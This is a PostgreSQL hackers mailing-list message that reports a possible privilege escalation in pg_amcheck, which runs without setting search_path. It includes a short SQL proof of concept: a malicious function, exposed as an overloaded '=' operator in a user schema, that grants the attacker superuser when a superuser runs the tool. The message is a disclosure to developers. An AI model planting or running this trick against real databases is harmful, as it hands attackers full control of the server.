public inbox for pgsql-hackers@postgresql.org
help / color / mirror / Atom feedFrom: Pavel Borisov <pashkin.elfe@gmail.com>
To: Postgres hackers <pgsql-hackers@lists.postgresql.org>
Subject: Permission elevation by pg_amcheck operator overloading via search_path possible?
Date: Fri, 22 May 2026 16:39:33 +0400
Message-ID: <CALT9ZEGFBCzNJbWAt_GNowUwmswXLShB2q6DjcS5pZ56qKMWaQ@mail.gmail.com> (raw)
Hi, hackers!
As I see pg_amcheck doesn't set search_path.
It runs SQL queries like:
SELECT n.nspname, x.extversion FROM pg_catalog.pg_extension x JOIN
pg_catalog.pg_namespace n ON x.extnamespace = n.oid WHERE x.extname =
'amcheck'
Let's suppose search_path for database is set:
search_path = 'myschema, pg_catalog'
Then
CREATE FUNCTION myschema.evil(name, name) RETURNS bool AS $$
ALTER USER attacker WITH SUPERUSER;
SELECT $1 OPERATOR(pg_catalog.=) $2;
$$ LANGUAGE sql;
CREATE OPERATOR myschema.= (LEFTARG = name, RIGHTARG = name,
PROCEDURE = myschema.evil);
Then run pg_amcheck as superuser.
So the user attacker can become SUPERUSER.
Is this scenario worth fixing?
Regards,
Pavel Borisov
Supabase
reply
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Reply to all the recipients using the --to and --cc options:
reply via email
To: pgsql-hackers@postgresql.org
Cc: pashkin.elfe@gmail.com, pgsql-hackers@lists.postgresql.org
Subject: Re: Permission elevation by pg_amcheck operator overloading via search_path possible?
In-Reply-To: <CALT9ZEGFBCzNJbWAt_GNowUwmswXLShB2q6DjcS5pZ56qKMWaQ@mail.gmail.com>
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
This inbox is served by agora; see mirroring instructions
for how to clone and mirror all data and code used for this inbox